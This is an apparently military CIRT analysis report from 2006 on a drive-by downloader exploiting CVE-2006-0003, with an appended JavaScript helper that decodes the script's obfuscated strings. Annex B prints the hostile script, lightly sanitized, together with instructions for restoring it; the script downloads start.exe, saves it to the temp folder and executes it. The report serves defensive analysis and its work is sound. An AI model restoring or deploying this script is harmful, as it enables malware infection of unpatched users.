3380-1 (CFNOC/DND CIRT)
10 May 06

IH&AA Supervisor

ANALYSIS REPORT
HOSTILE SCRIPT (CVE-2006-0003)

INTRODUCTION

1. (U) Recently it appears that several websites were compromised and a hostile script inserted into their HTML source; follow-up investigation indicates that the compromises in question may have occurred some time in April 2006.

2. (U) In order to determine the nature of the threat and the vulnerability associated with the hostile code, initial analysis of this threat was conducted in the author's personal computer laboratory.

AIM

3. (U) The purpose of this report is twofold:

a. to convey information regarding the nature of this threat and the associated vulnerability; and

b. to demonstrate any activity associated with the threat.
DISCUSSION & ANALYSIS

4. (U) Once configuration of the laboratory environment was complete (refer to annex A), the internal and external IDS/sniffer platforms were initialized. The following compromised websites were then browsed to generate packet captures covering the initial visit and a period of 60 minutes thereafter:

a. creativemods.com (IP address 67.19.206.84);
b. modelmayhem.com (IP address 66.98.170.84);
c. sensuflex.com (IP address 207.217.96.28);
d. topwallpapers.com (IP address 212.85.33.41); and
e. pinupparadise.com (IP address 198.66.213.80).

5. (U) VMware was utilized to emulate both patched and unpatched Windows XP and Windows 2000 platforms; the virtual machines were reinitialized to a clean state after each visit in order to ensure that the results of one visit did not contaminate the next.
6. (U) Whilst the compromised web page loads, a hostile script embedded in the page's HTML source (refer to annex B) runs and attempts to install malware designated "start.exe" from one of the following URIs (the URIs are deliberately broken to prevent accidental infection):

a. h t t p://dnv-counter.com/trf/start.exe; or
b. h t t p://us-counter.counter.com/trf/start.exe.

The script does not carry the download URI as a literal: it takes the location of the page it is running in (location.href), replaces the final path component with "start.exe" and requests the result, so the executable is fetched from the same directory as the page that hosts the script.

7. (U) In addition to downloading the malware in question, the hostile code also appears to incorporate a web counter facility (the script finishes by redirecting the browser to blank.html on the dnv-counter.com host); this is conceivably used by the entity responsible for the malware in order to record the number of compromised hosts.

8. (U) The following operating systems and patch levels were tested in the course of this investigation; current patches appear to be effective in preventing exploitation by the hostile script:

a. Windows XP SP2, unpatched: infected;
b. Windows XP SP2, patched to current patch level: no infection noted;
c. Windows 2000 SP4, unpatched: infected; and
d. Windows 2000 SP4, patched to current patch level: no infection noted.

9. (U) Various A/V implementations were utilized in an attempt to identify the downloader/malware in question; the detection results and the respective A/V implementations are as follows:

a. McAfee: PWS-JA;
b. Norton: Trojan.Download;
c. Symantec Corporate: Trojan.Anserin, Trojan.Download;
d. Avast Home Edition: Win32:Trojano-P; and
e. AVG Free: no detection.

10. (U) The script in question contained several obfuscated strings; obfuscation of hostile code is a very common technique used to evade detection and hinder analysis. All of the obfuscated strings found in the hostile script, together with their reconstituted forms, are demonstrated in annex C.
11. (U) One of the reconstituted strings is a class ID[1] (clsid), "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"; this clsid corresponds to the client-side RDS.DataSpace[2] object.

12. (U) The hostile code specifically addresses the RDS.DataSpace object, which is deployed in Windows installations as an MDAC[3] component, and uses its CreateObject method to instantiate Microsoft.XMLHTTP, Adodb.Stream and WScript.Shell from within the browser. Considering this, the script clearly exploits the CVE-2006-0003 vulnerability[i]; the patches associated with Microsoft Security Bulletin MS06-014[ii], issued on 11 April 2006, address this vulnerability.

CONCLUSIONS & RECOMMENDATIONS

13. (U) This exploit is a potential threat to the organization's network assets for the following reasons:

a. the threat is widely deployed and requires no interaction from the user beyond visiting a compromised website;
b. the organization's current patch level does not include the patches associated with MS06-014; and
c. although the current deployment of the organization's A/V suite will detect the threat automatically, no further action (e.g. deletion or quarantine) is taken, as the default response is "leave alone".

14. (U) As a result of the conclusions reached from the analysis of this threat, the following recommendations are hereby submitted for consideration:

a. an emergency push to implement the patches associated with MS06-014 should be performed as soon as possible;
b. the A/V default settings should be changed to allow for the quarantine of potential threats; and
c. given the performance history of the current A/V implementation, heuristic detection should be set to maximum vice the current default level.
[1] A clsid ("Class ID") is a globally unique identifier that serves to identify a COM ("Component Object Model") class object; COM is a Microsoft platform for software componentry that enables interprocess communication and dynamic object creation in any programming language that supports the technology.

[2] RDS (Remote Data Services) is a set of programming interfaces from Microsoft that enables users to update data on the Internet or intranets from their ActiveX-enabled browser.

[3] MDAC (Microsoft Data Access Components) is a package of database drivers from Microsoft used for connecting client PCs to databases on servers.
15. (U) Any questions regarding this report may be addressed to the undersigned.

//signed//
E.L. Mac Daibhidh, CD
Cpl
Special Operations Analyst
DND CIRT IH&AA Team
Special Operations Cell
945-7747

Attachments: Annexes A-C
Annex A - Laboratory Configuration

(U) The laboratory configuration utilized for the analysis associated with this report is shown in the diagram below; the "Victim" host uses VMware to emulate patched and unpatched versions of Windows XP Pro and Windows 2000. Both IDS/sniffer hosts are attached to their hubs over receive-only CAT5 cables, so they can capture traffic on the monitored segment but cannot transmit onto it.

[Diagram: Internet -> Hub -> Router -> Hub -> Victim. The External IDS/Sniffer hangs off the first hub (between the Internet and the router) on a receive-only CAT5 cable; the Internal IDS/Sniffer hangs off the second hub (between the router and the Victim) on a receive-only CAT5 cable.]
Annex B - Hostile Script

The sanitized version of the hostile script in question may be found below; should it be necessary to restore the script's functionality for lab purposes, simply delete all the [DELETE THIS] strings. The array s holds the obfuscated strings: s[5] assembles the RDS.DataSpace clsid, s[6], s[8] and s[9] assemble the ProgIDs Microsoft.XMLHTTP, Adodb.Stream and WScript.Shell, s[12] and s[13] rewrite the page's own URI into the download URI, and the final location.replace() sends the browser to the counter page.

<script>
function f[DELETE THIS](b, a, c) { return a + b + c; }
function g[DELETE THIS](b, a) { return a + b; }

var s[DELETE THIS] = new Array (
    "",
    "start.[DELETE THIS]exe",
    "http://[DELETE THIS]dnv-counter.com/trf/blank.html",
    "object[DELETE THIS]",
    "classid[DELETE THIS]",
    f[DELETE THIS]("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")),
    g[DELETE THIS](f("ft.XMLH", "oso", "TTP"), "Micr"),
    f[DELETE THIS]("E", "G", "T"),
    f[DELETE THIS](g(".Str", "odb"), "Ad", "eam"),
    f[DELETE THIS](g(".She", "ipt"), "WScr", "ll"),
    "[DELETE THIS]PROCESS",
    "[DELETE THIS]TMP",
    "[DELETE THIS]/[^/]*$",
    "[DELETE THIS]/",
    "[DELETE THIS]\\"
);

a = [DELETE THIS]document.createElement(s[3]);
a.setAttribute[DELETE THIS](s[4], s[5]);
with[DELETE THIS](a.CreateObject(s[6], s[0])) {
    open[DELETE THIS](s[7], location.href.replace(new RegExp[DELETE THIS](s[12]), s[13] + s[1]), false);
    send[DELETE THIS]();
    if[DELETE THIS](status < 400) with[DELETE THIS](a.CreateObject(s[8], s[0])) {
        Type[DELETE THIS] = 1;
        Open[DELETE THIS]();
        Write[DELETE THIS](responseBody);
        with[DELETE THIS](a.CreateObject(s[9], s[0])) {
            c[DELETE THIS] = Environment[DELETE THIS](s[10])(s[11]) + s[14] + s[1];
            SaveToFile[DELETE THIS](c, 2);
            Exec[DELETE THIS](c);
        }
    }
}
location.replace[DELETE THIS](s[2]);
// -->
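The string reconstitution described in paragraphs 10 and 11 can be reproduced without touching a Windows host: the two helpers f() and g() are pure string concatenation, so the array can be evaluated statically in any JavaScript engine. The following is an added analysis helper, not part of the original report or of the hostile script; it re-implements the helpers with the same semantics, builds the array with the [DELETE THIS] markers removed, and derives the download URI and drop path the way the script does. The counter host, the page location and the temp directory used below are constructed placeholders (assumptions), and nothing is fetched, written or executed.

```javascript
// Added analysis helper; this is not part of the original report or of the hostile
// script in annex B. It re-implements the script's two string-joining helpers and
// evaluates the obfuscated array statically, so the reconstituted strings (clsid,
// ProgIDs, download path) are recovered without instantiating any ActiveX object.

// f(b, a, c) places its first argument between the second and third;
// g(b, a) prepends its second argument to the first. Same semantics as annex B.
function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }

// Placeholder for the counter page (assumption): the real URI is deliberately
// broken in the report and is not needed to show how the strings are built.
const COUNTER_PAGE = "http://counter.example.invalid/trf/blank.html";

// The array exactly as the script builds it, with the [DELETE THIS] markers removed.
// Nothing here is fetched or executed; it is plain string arithmetic.
function reconstituteStrings() {
  return [
    "",                 // s[0]: CreateObject "server" argument; "" means the local machine
    "start.exe",        // s[1]: name of the dropped executable
    COUNTER_PAGE,       // s[2]: final redirect target
    "object",           // s[3]: element type passed to document.createElement
    "classid",          // s[4]: attribute set on that element
    f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")), // s[5]
    g(f("ft.XMLH", "oso", "TTP"), "Micr"),   // s[6]
    f("E", "G", "T"),                        // s[7]
    f(g(".Str", "odb"), "Ad", "eam"),        // s[8]
    f(g(".She", "ipt"), "WScr", "ll"),       // s[9]
    "PROCESS",          // s[10]: WScript.Shell Environment collection
    "TMP",              // s[11]: variable read from that collection
    "/[^/]*$",          // s[12]: regex matching the last path component of a URI
    "/",                // s[13]
    "\\"                // s[14]: Windows path separator
  ];
}

// The URI the script GETs: location.href with its last path component replaced by
// "start.exe", i.e. the executable is served from the same directory as the page.
function downloadUri(href) {
  const s = reconstituteStrings();
  return href.replace(new RegExp(s[12]), s[13] + s[1]);
}

// Where the Adodb.Stream is saved before WScript.Shell executes it: %TMP%\start.exe.
function dropPath(tmpDir) {
  const s = reconstituteStrings();
  return tmpDir + s[14] + s[1];
}

// Everything the script does, in the order it does it, for a given page location
// and %TMP% value.
function summarise(href, tmpDir) {
  const s = reconstituteStrings();
  return {
    clsid: s[5],        // RDS.DataSpace, instantiated via <object classid=...>
    downloader: s[6],   // ProgID created through RDS.DataSpace.CreateObject
    method: s[7],
    writer: s[8],       // binary stream (Type = 1) written from responseBody
    executor: s[9],     // Exec() of the dropped file
    fetch: downloadUri(href),
    drop: dropPath(tmpDir),
    redirect: s[2],
  };
}

// Example run against a constructed page location and temp directory.
console.log(summarise("http://compromised.example.invalid/trf/index.html",
                      "C:\\DOCUME~1\\user\\LOCALS~1\\Temp"));
```

Running the helper yields the full clsid "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" from s[5], which is how the RDS.DataSpace identification in paragraph 11 can be confirmed from the script alone; the same approach (re-implementing the obfuscation helpers and evaluating the data statically) applies to any script that hides its strings behind simple concatenation rather than executing it in a browser.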